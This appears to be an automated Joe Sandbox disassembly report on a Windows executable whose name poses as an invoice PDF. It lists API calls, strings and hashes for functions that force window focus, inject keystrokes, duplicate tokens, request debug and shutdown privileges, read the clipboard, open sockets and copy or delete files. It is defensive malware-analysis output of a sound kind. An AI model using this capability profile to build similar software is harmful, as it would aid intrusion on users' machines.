                                                                              • Snapshot File: hcaresult_0_2_400000_Outstanding Invoices Spreadsheet Scan 00495_PDF.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID: PF$'|G$*"D$*vG$+%F$0wE$2G$5CG$7eF$<HF$<G$ApG$DvE$GSG$IqE$K@G$LbF$MdF$NgF$PIF$YtG$^[F$_?G$b"D$i}G$j)F$kQG$lE$rTG$vjE$}eE$*F$3G$_G$wG
                                                                              • API String ID: 0-3772701627
                                                                              • Opcode ID: bb854585b2a8d25cf70b859c951904b6599901827447d171664d6ae6ba41e592
                                                                              • Instruction ID: b1e67458769bbea4a86cd8903524db5b6e79558e2e7ab8c51025fc7bd56032a7
                                                                              • Opcode Fuzzy Hash: bb854585b2a8d25cf70b859c951904b6599901827447d171664d6ae6ba41e592
                                                                              • Instruction Fuzzy Hash: 118366F1905B409FC351DFAAF984605BAE1F3AA3157A2857FC5088B731D7B8194A8F4C
                                                                              APIs
                                                                              • GetForegroundWindow.USER32(00000000,?,?,004448AF,?), ref: 004375B3
                                                                              • FindWindowW.USER32(Shell_TrayWnd,00000000), ref: 004375D8
                                                                              • IsIconic.USER32(?), ref: 004375E1
                                                                              • ShowWindow.USER32(?,00000009,?,?,004448AF,?), ref: 004375EE
                                                                              • SetForegroundWindow.USER32(?), ref: 004375FD
                                                                              • GetWindowThreadProcessId.USER32(00000000,00000000), ref: 00437615
                                                                              • GetCurrentThreadId.KERNEL32 ref: 00437619
                                                                              • GetWindowThreadProcessId.USER32(?,00000000), ref: 00437624
                                                                              • AttachThreadInput.USER32(00000000,00000000,00000001,?,?,004448AF,?), ref: 00437632
                                                                              • AttachThreadInput.USER32(00000000,00000000,00000001,?,?,004448AF,?), ref: 00437638
                                                                              • AttachThreadInput.USER32(00000000,00000000,00000001,?,?,004448AF,?), ref: 0043763E
                                                                              • SetForegroundWindow.USER32(?), ref: 00437645
                                                                              • MapVirtualKeyW.USER32(00000012,00000000), ref: 00437654
                                                                              • keybd_event.USER32(00000012,00000000), ref: 0043765D
                                                                              • MapVirtualKeyW.USER32(00000012,00000000), ref: 0043766B
                                                                              • keybd_event.USER32(00000012,00000000), ref: 00437674
                                                                              • MapVirtualKeyW.USER32(00000012,00000000), ref: 00437682
                                                                              • keybd_event.USER32(00000012,00000000), ref: 0043768B
                                                                              • MapVirtualKeyW.USER32(00000012,00000000), ref: 00437699
                                                                              • keybd_event.USER32(00000012,00000000), ref: 004376A2
                                                                              • SetForegroundWindow.USER32(?), ref: 004376AD
                                                                              • AttachThreadInput.USER32(00000000,00000000,00000000,?,?,004448AF), ref: 004376CD
                                                                              • AttachThreadInput.USER32(00000000,00000000,00000000,?,?,004448AF), ref: 004376D3
                                                                              • AttachThreadInput.USER32(00000000,00000000,00000000,?,?,004448AF), ref: 004376D9
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.2041538979.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000000.00000002.2041490917.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.2041578137.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.2041591644.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.2041591644.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.2041644712.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_400000_Outstanding Invoices Spreadsheet Scan 00495_PDF.jbxd
                                                                              Similarity
                                                                              • API ID: Thread$Window$AttachInput$ForegroundVirtualkeybd_event$Process$CurrentFindIconicShow
                                                                              • String ID: Shell_TrayWnd
                                                                              • API String ID: 3778422247-2988720461
                                                                              • Opcode ID: ec12ba9e870cc2e5dd85ad52799cb15a6745d125a488419c4f0ebb71fc1ee38e
                                                                              • Instruction ID: 6108fbe056c1a000d5481f33e03d330ccc862392245923d3170deea12ea07584
                                                                              • Opcode Fuzzy Hash: ec12ba9e870cc2e5dd85ad52799cb15a6745d125a488419c4f0ebb71fc1ee38e
                                                                              • Instruction Fuzzy Hash: AC31A4712803157FE6245BA59D0EF7F3F9CEB48B51F10082EFA02EA1D1DAE458009B79
                                                                              APIs
                                                                              • _memset.LIBCMT ref: 0044621B
                                                                              • DuplicateTokenEx.ADVAPI32(?,00000000,00000000,00000002,00000001,?,?,?,?,?,?,?,?,?,?,?), ref: 00446277
                                                                              • CloseHandle.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 0044628A
                                                                              • OpenWindowStationW.USER32(winsta0,00000000,00060000), ref: 004462A4
                                                                              • GetProcessWindowStation.USER32(?,?,?,?,?,?,?,?,?,?,?,?), ref: 004462BD
                                                                              • SetProcessWindowStation.USER32(00000000,?,?,?,?,?,?,?,?,?,?,?,?), ref: 004462C8
                                                                              • OpenDesktopW.USER32(default,00000000,00000000,00060081), ref: 004462E4
                                                                              • _wcslen.LIBCMT ref: 0044639E
                                                                                • Part of subcall function 0041171A: _malloc.LIBCMT ref: 00411734
                                                                              • _wcsncpy.LIBCMT ref: 004463C7
                                                                              • LoadUserProfileW.USERENV(?,00000000,00000000,?,?,00000000,?,?,?,?), ref: 004463E7
                                                                              • CreateEnvironmentBlock.USERENV(?,?,00000000,00000000,?,?,00000000,?,?,?,?), ref: 00446408
                                                                              • CreateProcessAsUserW.ADVAPI32(?,00000000,00000000,00000000,00000000,?,?,?,?,?,?,00000000,?,?,00000000,?), ref: 00446446
                                                                              • UnloadUserProfile.USERENV(?,?,?,?,?,?,?), ref: 00446483
                                                                              • CloseWindowStation.USER32(00000000,?,?,?,?), ref: 00446497
                                                                              • CloseDesktop.USER32(00000000,?,?,?,?), ref: 0044649E
                                                                              • SetProcessWindowStation.USER32(?,?,?,?,?), ref: 004464A9
                                                                              • CloseHandle.KERNEL32(?,?,?,?,?), ref: 004464B4
                                                                              • DestroyEnvironmentBlock.USERENV(?,?,?,?,?,?), ref: 004464C8
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.2041538979.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000000.00000002.2041490917.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.2041578137.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.2041591644.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.2041591644.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.2041644712.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_400000_Outstanding Invoices Spreadsheet Scan 00495_PDF.jbxd
                                                                              Similarity
                                                                              • API ID: StationWindow$CloseProcess$User$BlockCreateDesktopEnvironmentHandleOpenProfile$DestroyDuplicateLoadTokenUnload_malloc_memset_wcslen_wcsncpy
                                                                              • String ID: $default$winsta0
                                                                              • API String ID: 2173856841-1027155976
                                                                              • Opcode ID: 05b9397f8b4714607c622f001828b7a188a4c98331011edd3f265004302c4541
                                                                              • Instruction ID: eafd5d154f9bcf2590b8f8eb1e0f3d39b01f77f2fd200ee1cb9c7344d9c52646
                                                                              • Opcode Fuzzy Hash: 05b9397f8b4714607c622f001828b7a188a4c98331011edd3f265004302c4541
                                                                              • Instruction Fuzzy Hash: DD819170208341AFE724DF65C848B6FBBE8AF89744F04491DF69097291DBB8D805CB6B
                                                                              APIs
                                                                              • _wcslen.LIBCMT ref: 00409A61
                                                                                • Part of subcall function 0041171A: _malloc.LIBCMT ref: 00411734
                                                                                • Part of subcall function 0041171A: std::bad_alloc::bad_alloc.LIBCMT ref: 00411757
                                                                                • Part of subcall function 0041171A: std::bad_exception::bad_exception.LIBCMT ref: 0041176B
                                                                                • Part of subcall function 0041171A: __CxxThrowException@8.LIBCMT ref: 00411779
                                                                              • CharUpperBuffW.USER32(?,?), ref: 00409AF5
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.2041538979.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000000.00000002.2041490917.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.2041578137.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.2041591644.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.2041591644.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.2041644712.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_400000_Outstanding Invoices Spreadsheet Scan 00495_PDF.jbxd
                                                                              Similarity
                                                                              • API ID: BuffCharException@8ThrowUpper_malloc_wcslenstd::bad_alloc::bad_allocstd::bad_exception::bad_exception
                                                                              • String ID: 0vH$4RH
                                                                              • API String ID: 1143807570-2085553193
                                                                              APIs
                                                                                • Part of subcall function 0040FFB0: GetFullPathNameW.KERNEL32(00000000,00000104,C:\Users\user\Desktop\Outstanding Invoices Spreadsheet Scan 00495_PDF.exe,?,C:\Users\user\Desktop\Outstanding Invoices Spreadsheet Scan 00495_PDF.exe,004A8E80,C:\Users\user\Desktop\Outstanding Invoices Spreadsheet Scan 00495_PDF.exe,0040F3D2), ref: 0040FFCA
                                                                                • Part of subcall function 00436A1D: __wsplitpath.LIBCMT ref: 00436A45
                                                                                • Part of subcall function 00436A1D: __wsplitpath.LIBCMT ref: 00436A6C
                                                                                • Part of subcall function 00436A1D: __wcsicoll.LIBCMT ref: 00436A93
                                                                                • Part of subcall function 00436AC4: GetFileAttributesW.KERNEL32(?,0044BD82,?,?,?), ref: 00436AC9
                                                                              • _wcscat.LIBCMT ref: 0044BD96
                                                                              • _wcscat.LIBCMT ref: 0044BDBF
                                                                              • __wsplitpath.LIBCMT ref: 0044BDEC
                                                                              • FindFirstFileW.KERNEL32(?,?), ref: 0044BE04
                                                                              • _wcscpy.LIBCMT ref: 0044BE73
                                                                              • _wcscat.LIBCMT ref: 0044BE85
                                                                              • _wcscat.LIBCMT ref: 0044BE97
                                                                              • lstrcmpiW.KERNEL32(?,?), ref: 0044BEC3
                                                                              • DeleteFileW.KERNEL32(?), ref: 0044BED5
                                                                              • MoveFileW.KERNEL32(?,?), ref: 0044BEF5
                                                                              • CopyFileW.KERNEL32(?,?,00000000), ref: 0044BF0C
                                                                              • DeleteFileW.KERNEL32(?), ref: 0044BF17
                                                                              • CopyFileW.KERNEL32(?,?,00000000), ref: 0044BF2E
                                                                              • FindClose.KERNEL32(00000000), ref: 0044BF35
                                                                              • MoveFileW.KERNEL32(?,?), ref: 0044BF51
                                                                              • FindNextFileW.KERNEL32(00000000,00000010), ref: 0044BF66
                                                                              • FindClose.KERNEL32(00000000), ref: 0044BF7E
                                                                              Strings
                                                                              Similarity
                                                                              • API ID: File$Find_wcscat$__wsplitpath$CloseCopyDeleteMove$AttributesFirstFullNameNextPath__wcsicoll_wcscpylstrcmpi
                                                                              • String ID: \*.*
                                                                              • API String ID: 2188072990-1173974218
                                                                              APIs
                                                                              • GetFullPathNameW.KERNEL32(?,00000104,?,?), ref: 00434D75
                                                                              • __swprintf.LIBCMT ref: 00434D91
                                                                              • _wcslen.LIBCMT ref: 00434D9B
                                                                              • _wcslen.LIBCMT ref: 00434DB0
                                                                              • _wcslen.LIBCMT ref: 00434DC5
                                                                              • CreateDirectoryW.KERNEL32(?,00000000), ref: 00434DD7
                                                                              • CreateFileW.KERNEL32(?,40000000,00000000,00000000,00000003,02200000,00000000), ref: 00434E0A
                                                                              • _memset.LIBCMT ref: 00434E27
                                                                              • _wcslen.LIBCMT ref: 00434E3C
                                                                              • _wcsncpy.LIBCMT ref: 00434E6F
                                                                              • DeviceIoControl.KERNEL32(00000000,000900A4,?,?,00000000,00000000,?,00000000), ref: 00434EA9
                                                                              • CloseHandle.KERNEL32(00000000), ref: 00434EB4
                                                                              • RemoveDirectoryW.KERNEL32(?), ref: 00434EBB
                                                                              • CloseHandle.KERNEL32(00000000), ref: 00434ECE
                                                                              Strings
                                                                              Similarity
                                                                              • API ID: _wcslen$CloseCreateDirectoryHandle$ControlDeviceFileFullNamePathRemove__swprintf_memset_wcsncpy
                                                                              • String ID: :$\$\??\%s
                                                                              • API String ID: 302090198-3457252023
                                                                              APIs
                                                                                • Part of subcall function 00444233: _wcslen.LIBCMT ref: 0044424E
                                                                              • OpenProcess.KERNEL32(00000001,00000000,?), ref: 0046449E
                                                                              • GetLastError.KERNEL32 ref: 004644B4
                                                                              • GetCurrentThread.KERNEL32 ref: 004644C8
                                                                              • OpenThreadToken.ADVAPI32(00000000), ref: 004644CF
                                                                              • GetCurrentProcess.KERNEL32(00000028,?), ref: 004644E0
                                                                              • OpenProcessToken.ADVAPI32(00000000), ref: 004644E7
                                                                              Strings
                                                                              Similarity
                                                                              • API ID: OpenProcess$CurrentThreadToken$ErrorLast_wcslen
                                                                              • String ID: SeDebugPrivilege
                                                                              • API String ID: 1312810259-2896544425
                                                                              APIs
                                                                                • Part of subcall function 00401B70: _wcslen.LIBCMT ref: 00401B71
                                                                              • GetCurrentDirectoryW.KERNEL32(00000104,?,?), ref: 00403871
                                                                              • GetFullPathNameW.KERNEL32(?,00000104,?,?), ref: 00403887
                                                                              • __wsplitpath.LIBCMT ref: 004038B2
                                                                                • Part of subcall function 00413DB0: __wsplitpath_helper.LIBCMT ref: 00413DF2
                                                                              • _wcscpy.LIBCMT ref: 004038C7
                                                                              • _wcscat.LIBCMT ref: 004038DC
                                                                              • SetCurrentDirectoryW.KERNEL32(?), ref: 004038EC
                                                                                • Part of subcall function 0041171A: _malloc.LIBCMT ref: 00411734
                                                                                • Part of subcall function 0041171A: std::bad_alloc::bad_alloc.LIBCMT ref: 00411757
                                                                                • Part of subcall function 0041171A: std::bad_exception::bad_exception.LIBCMT ref: 0041176B
                                                                                • Part of subcall function 0041171A: __CxxThrowException@8.LIBCMT ref: 00411779
                                                                                • Part of subcall function 00403F40: MultiByteToWideChar.KERNEL32(00000000,00000001,?,?,00000000,00000000,?,?,0040397D,?,?,00000010), ref: 00403F54
                                                                                • Part of subcall function 00403F40: MultiByteToWideChar.KERNEL32(00000000,00000001,?,?,00000000,00000000,00000000,?,00000010), ref: 00403F8B
                                                                              • _wcscpy.LIBCMT ref: 004039C2
                                                                              • _wcslen.LIBCMT ref: 00403A53
                                                                              • _wcslen.LIBCMT ref: 00403AAA
                                                                              Strings
                                                                              • _, xrefs: 00403B48
                                                                              • Unterminated string, xrefs: 0042B9BA
                                                                              • Error opening the file, xrefs: 0042B8AC
                                                                              • #include depth exceeded. Make sure there are no recursive includes, xrefs: 0042B87B
                                                                              Similarity
                                                                              • API ID: _wcslen$ByteCharCurrentDirectoryMultiWide_wcscpy$Exception@8FullNamePathThrow__wsplitpath__wsplitpath_helper_malloc_wcscatstd::bad_alloc::bad_allocstd::bad_exception::bad_exception
                                                                              • String ID: #include depth exceeded. Make sure there are no recursive includes$Error opening the file$Unterminated string$_
                                                                              • API String ID: 4115725249-188983378
                                                                              APIs
                                                                              • FindFirstFileW.KERNEL32(?,?), ref: 00434C12
                                                                              • GetFileAttributesW.KERNEL32(?), ref: 00434C4F
                                                                              • SetFileAttributesW.KERNEL32(?,?), ref: 00434C65
                                                                              • FindNextFileW.KERNEL32(00000000,?), ref: 00434C77
                                                                              • FindClose.KERNEL32(00000000), ref: 00434C88
                                                                              • FindClose.KERNEL32(00000000), ref: 00434C9C
                                                                              • FindFirstFileW.KERNEL32(*.*,?), ref: 00434CB7
                                                                              • SetCurrentDirectoryW.KERNEL32(?), ref: 00434CFE
                                                                              • SetCurrentDirectoryW.KERNEL32(0048A090), ref: 00434D22
                                                                              • FindNextFileW.KERNEL32(00000000,00000010), ref: 00434D2A
                                                                              • FindClose.KERNEL32(00000000), ref: 00434D35
                                                                              • FindClose.KERNEL32(00000000), ref: 00434D43
                                                                              Strings
                                                                              Similarity
                                                                              • API ID: Find$File$Close$AttributesCurrentDirectoryFirstNext
                                                                              • String ID: *.*
                                                                              • API String ID: 1409584000-438819550
                                                                              APIs
                                                                              Strings
                                                                              Similarity
                                                                              • API ID: Timetime$Sleep
                                                                              • String ID: BUTTON
                                                                              • API String ID: 4176159691-3405671355
                                                                              APIs
                                                                              • FindFirstFileW.KERNEL32(?,75918FB0,75918FB0,?,?,00000000), ref: 00442E40
                                                                              • FindNextFileW.KERNEL32(00000000,?,?,00000000), ref: 00442EA4
                                                                              • FindClose.KERNEL32(00000000,?,00000000), ref: 00442EB5
                                                                              • FindClose.KERNEL32(00000000,?,?,?,?,?,?,00000000), ref: 00442ED1
                                                                              • FindFirstFileW.KERNEL32(*.*,?), ref: 00442EF0
                                                                              • SetCurrentDirectoryW.KERNEL32(?,?,?,?,00000000), ref: 00442F3B
                                                                              • SetCurrentDirectoryW.KERNEL32(0048A090,?,?,?,00000000), ref: 00442F6D
                                                                              • FindNextFileW.KERNEL32(00000000,00000010), ref: 00442F75
                                                                              • FindClose.KERNEL32(00000000), ref: 00442F80
                                                                                • Part of subcall function 00436D2D: CreateFileW.KERNEL32(?,40000000,00000001,00000000,00000003,02000080,00000000,75923220,00000000,00000000,00442E95,?,?,?), ref: 00436D4F
                                                                              • FindClose.KERNEL32(00000000,?,?,?,00000000), ref: 00442F92
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.2041538979.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000000.00000002.2041490917.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.2041578137.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.2041591644.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.2041591644.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.2041644712.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_400000_Outstanding Invoices Spreadsheet Scan 00495_PDF.jbxd
                                                                              Similarity
                                                                              • API ID: Find$File$Close$CurrentDirectoryFirstNext$Create
                                                                              • String ID: *.*
                                                                              • API String ID: 2640511053-438819550
                                                                              APIs
                                                                                • Part of subcall function 004392BC: GetUserObjectSecurity.USER32(?,?,?,00000000,?), ref: 004392DE
                                                                                • Part of subcall function 004392BC: GetLastError.KERNEL32 ref: 004392E4
                                                                                • Part of subcall function 004392BC: GetUserObjectSecurity.USER32(?,?,00000000,?,?), ref: 0043930B
                                                                                • Part of subcall function 0043928B: InitializeSecurityDescriptor.ADVAPI32(00000000,00000001,00000000,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 004392A5
                                                                              • GetSecurityDescriptorDacl.ADVAPI32(?,00000004,?,?,?,?), ref: 00445E4B
                                                                              • _memset.LIBCMT ref: 00445E61
                                                                              • GetAclInformation.ADVAPI32(?,?,0000000C,00000002), ref: 00445E83
                                                                              • GetLengthSid.ADVAPI32(?), ref: 00445E92
                                                                              • GetAce.ADVAPI32(?,00000000,?,?,00000018), ref: 00445EDE
                                                                              • AddAce.ADVAPI32(?,00000002,000000FF,?,?), ref: 00445EFB
                                                                              • GetLengthSid.ADVAPI32(?,?,00000018), ref: 00445F11
                                                                              • GetLengthSid.ADVAPI32(?,00000008,?,?,00000000,?,00000000), ref: 00445F39
                                                                              • CopySid.ADVAPI32(00000000,?,00000000,?,00000000), ref: 00445F40
                                                                              • AddAce.ADVAPI32(?,00000002,000000FF,00000000,?,?,00000000,?,00000000), ref: 00445F6E
                                                                              • SetSecurityDescriptorDacl.ADVAPI32(?,00000001,?,00000000,?,00000000,?,00000000), ref: 00445F8B
                                                                              • SetUserObjectSecurity.USER32(?,?,?), ref: 00445FA0
                                                                              Similarity
                                                                              • API ID: Security$DescriptorLengthObjectUser$Dacl$CopyErrorInformationInitializeLast_memset
                                                                              • String ID:
                                                                              • API String ID: 3490752873-0
                                                                              APIs
                                                                              • OleInitialize.OLE32(00000000), ref: 0047AA03
                                                                              • CLSIDFromProgID.OLE32(00000000,?), ref: 0047AA27
                                                                              • CoCreateInstance.OLE32(?,00000000,00000005,004829C0,?), ref: 0047AAAA
                                                                              • CoInitializeSecurity.OLE32(00000000,000000FF,00000000,00000000,00000002,00000003,00000000,00000000,00000000), ref: 0047AB6B
                                                                              • _memset.LIBCMT ref: 0047AB7C
                                                                              • _wcslen.LIBCMT ref: 0047AC68
                                                                              • _memset.LIBCMT ref: 0047ACCD
                                                                              • CoCreateInstanceEx.OLE32 ref: 0047AD06
                                                                              • CoSetProxyBlanket.OLE32(004829D0,?,?,?,?,?,?,00000800), ref: 0047AD53
                                                                              Strings
                                                                              • NULL Pointer assignment, xrefs: 0047AD84
                                                                              Similarity
                                                                              • API ID: CreateInitializeInstance_memset$BlanketFromProgProxySecurity_wcslen
                                                                              • String ID: NULL Pointer assignment
                                                                              • API String ID: 1588287285-2785691316
                                                                              APIs
                                                                              • GetCurrentProcess.KERNEL32(00000028,?), ref: 004364B9
                                                                              • OpenProcessToken.ADVAPI32(00000000), ref: 004364C0
                                                                              • LookupPrivilegeValueW.ADVAPI32(00000000,SeShutdownPrivilege,?), ref: 004364D6
                                                                              • AdjustTokenPrivileges.ADVAPI32 ref: 004364FE
                                                                              • GetLastError.KERNEL32 ref: 00436504
                                                                              • ExitWindowsEx.USER32(?,00000000), ref: 00436527
                                                                              • InitiateSystemShutdownExW.ADVAPI32(00000000,00000000,00000000,00000000,00000000,00000001), ref: 00436557
                                                                              • SetSystemPowerState.KERNEL32(00000001,00000000), ref: 0043656A
                                                                              Similarity
                                                                              • API ID: ProcessSystemToken$AdjustCurrentErrorExitInitiateLastLookupOpenPowerPrivilegePrivilegesShutdownStateValueWindows
                                                                              • String ID: SeShutdownPrivilege
                                                                              • API String ID: 2938487562-3733053543
                                                                              APIs
                                                                              • __swprintf.LIBCMT ref: 00436162
                                                                              • __swprintf.LIBCMT ref: 00436176
                                                                                • Part of subcall function 0041353A: __woutput_l.LIBCMT ref: 0041358F
                                                                              • __wcsicoll.LIBCMT ref: 00436185
                                                                              • FindResourceW.KERNEL32(?,?,0000000E), ref: 004361A6
                                                                              • LoadResource.KERNEL32(?,00000000), ref: 004361AE
                                                                              • LockResource.KERNEL32(00000000), ref: 004361B5
                                                                              • FindResourceW.KERNEL32(?,?,00000003), ref: 004361DA
                                                                              • LoadResource.KERNEL32(?,00000000), ref: 004361E4
                                                                              • SizeofResource.KERNEL32(?,00000000), ref: 004361F0
                                                                              • LockResource.KERNEL32(?), ref: 004361FD
                                                                              Similarity
                                                                              • API ID: Resource$FindLoadLock__swprintf$Sizeof__wcsicoll__woutput_l
                                                                              • String ID:
                                                                              • API String ID: 2406429042-0
                                                                              APIs
                                                                              • SetErrorMode.KERNEL32(00000001), ref: 0045D522
                                                                              • GetDiskFreeSpaceW.KERNEL32(?,?,?,?,?,?), ref: 0045D593
                                                                              • GetLastError.KERNEL32 ref: 0045D59D
                                                                              • SetErrorMode.KERNEL32(?), ref: 0045D629
                                                                              Similarity
                                                                              • API ID: Error$Mode$DiskFreeLastSpace
                                                                              • String ID: INVALID$NOTREADY$READONLY$READY$UNKNOWN
                                                                              • API String ID: 4194297153-14809454
                                                                              APIs
                                                                              • MkParseDisplayName.OLE32(?,00000000,?,?), ref: 0047AF0F
                                                                                • Part of subcall function 004781AE: GetLastError.KERNEL32(?,?,?,?,?,?,?,?,00000001,00000000,NULL Pointer assignment,00000001), ref: 00478201
                                                                                • Part of subcall function 004781AE: VariantCopy.OLEAUT32(?,?), ref: 00478259
                                                                                • Part of subcall function 004781AE: VariantCopy.OLEAUT32(-00000058,?), ref: 00478270
                                                                                • Part of subcall function 004781AE: VariantCopy.OLEAUT32(-00000078,?), ref: 00478287
                                                                              • OleInitialize.OLE32(00000000), ref: 0047AE06
                                                                                • Part of subcall function 0040FFF0: _wcslen.LIBCMT ref: 0040FFF2
                                                                                • Part of subcall function 0040FFF0: _wcscpy.LIBCMT ref: 00410012
                                                                              • _wcslen.LIBCMT ref: 0047AE18
                                                                              • CreateBindCtx.OLE32(00000000,?), ref: 0047AEC2
                                                                              • CLSIDFromProgID.OLE32(00000000,?,?), ref: 0047AFCC
                                                                              • GetActiveObject.OLEAUT32(?,00000000,?), ref: 0047AFF9
                                                                              Similarity
                                                                              • API ID: CopyVariant$_wcslen$ActiveBindCreateDisplayErrorFromInitializeLastNameObjectParseProg_wcscpy
                                                                              • String ID: HH
                                                                              • API String ID: 1915432386-2761332787
                                                                              Strings
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID: DEFINE$`$h$h
                                                                              • API String ID: 0-4194577831
                                                                              APIs
                                                                              • socket.WSOCK32(00000002,00000001,00000006), ref: 004648B0
                                                                              • WSAGetLastError.WSOCK32(00000000,00000002,00000001,00000006,?,00000000), ref: 004648BE
                                                                              • bind.WSOCK32(00000000,?,00000010), ref: 004648DA
                                                                              • WSAGetLastError.WSOCK32(00000000,00000000,?,00000010,00000002,00000001,00000006,?,00000000), ref: 004648E6
                                                                              • closesocket.WSOCK32(00000000), ref: 0046492D
                                                                              Similarity
                                                                              • API ID: ErrorLast$bindclosesocketsocket
                                                                              • String ID:
                                                                              • API String ID: 2609815416-0
                                                                              APIs
                                                                              • CreateToolhelp32Snapshot.KERNEL32 ref: 00437043
                                                                              • Process32FirstW.KERNEL32(00000000,00000002), ref: 00437050
                                                                              • Process32NextW.KERNEL32(00000000,?), ref: 00437075
                                                                              • __wsplitpath.LIBCMT ref: 004370A5
                                                                                • Part of subcall function 00413DB0: __wsplitpath_helper.LIBCMT ref: 00413DF2
                                                                              • _wcscat.LIBCMT ref: 004370BA
                                                                              • __wcsicoll.LIBCMT ref: 004370C8
                                                                              • CloseHandle.KERNEL32(00000000,?), ref: 00437105
                                                                              Similarity
                                                                              • API ID: Process32$CloseCreateFirstHandleNextSnapshotToolhelp32__wcsicoll__wsplitpath__wsplitpath_helper_wcscat
                                                                              • String ID:
                                                                              • API String ID: 2547909840-0
                                                                              APIs
                                                                                • Part of subcall function 00401B70: _wcslen.LIBCMT ref: 00401B71
                                                                              • FindFirstFileW.KERNEL32(?,?,?,?,?,00000000), ref: 0045217E
                                                                              • Sleep.KERNEL32(0000000A,?,?,00000000), ref: 004521B2
                                                                              • FindNextFileW.KERNEL32(?,?,?,00000000), ref: 004522AC
                                                                              • FindClose.KERNEL32(?,?,00000000), ref: 004522C3
                                                                              Similarity
                                                                              • API ID: Find$File$CloseFirstNextSleep_wcslen
                                                                              • String ID: *.*
                                                                              • API String ID: 2693929171-438819550
                                                                              APIs
                                                                              • OpenClipboard.USER32(?), ref: 0046C635
                                                                              • IsClipboardFormatAvailable.USER32(0000000D), ref: 0046C643
                                                                              • GetClipboardData.USER32(0000000D), ref: 0046C64F
                                                                              • CloseClipboard.USER32 ref: 0046C65D
                                                                              • GlobalLock.KERNEL32(00000000), ref: 0046C688
                                                                              • CloseClipboard.USER32 ref: 0046C692
                                                                              • IsClipboardFormatAvailable.USER32(00000001), ref: 0046C6D5
                                                                              • GetClipboardData.USER32(00000001), ref: 0046C6DD
                                                                              • GlobalLock.KERNEL32(00000000), ref: 0046C6EE
                                                                              • GlobalUnlock.KERNEL32(00000000), ref: 0046C726
                                                                              • CloseClipboard.USER32 ref: 0046C866
                                                                              Similarity
                                                                              • API ID: Clipboard$CloseGlobal$AvailableDataFormatLock$OpenUnlock
                                                                              • String ID: HH
                                                                              • API String ID: 589737431-2761332787
                                                                              APIs
                                                                              • __wcsicoll.LIBCMT ref: 0043643C
                                                                              • mouse_event.USER32(00000800,00000000,00000000,00000078,00000000), ref: 00436452
                                                                              • __wcsicoll.LIBCMT ref: 00436466
                                                                              • mouse_event.USER32(00000800,00000000,00000000,00000088,00000000), ref: 0043647C
                                                                              Similarity
                                                                              • API ID: __wcsicollmouse_event
                                                                              • String ID: DOWN
                                                                              • API String ID: 1033544147-711622031
                                                                              APIs
                                                                                • Part of subcall function 004647A2: inet_addr.WSOCK32(?), ref: 004647C7
                                                                              • socket.WSOCK32(00000002,00000002,00000011), ref: 00474213
                                                                              • WSAGetLastError.WSOCK32(00000000), ref: 00474233
                                                                              Similarity
                                                                              • API ID: ErrorLastinet_addrsocket
                                                                              • String ID:
                                                                              • API String ID: 4170576061-0
                                                                              APIs
                                                                              • GetCursorPos.USER32(004A83D8), ref: 0045636A
                                                                              • ScreenToClient.USER32(004A83D8,?), ref: 0045638A
                                                                              • GetAsyncKeyState.USER32(?), ref: 004563D0
                                                                              • GetAsyncKeyState.USER32(?), ref: 004563DC
                                                                              • GetWindowLongW.USER32(?,000000F0), ref: 00456430
                                                                              Similarity
                                                                              • API ID: AsyncState$ClientCursorLongScreenWindow
                                                                              • String ID:
                                                                              • API String ID: 3539004672-0
                                                                              APIs
                                                                                • Part of subcall function 0046DD22: IsWindow.USER32(00000000), ref: 0046DD51
                                                                              • IsWindowVisible.USER32 ref: 00477314
                                                                              • IsWindowEnabled.USER32 ref: 00477324
                                                                              • GetForegroundWindow.USER32(?,?,?,00000001,?,?), ref: 00477331
                                                                              • IsIconic.USER32 ref: 0047733F
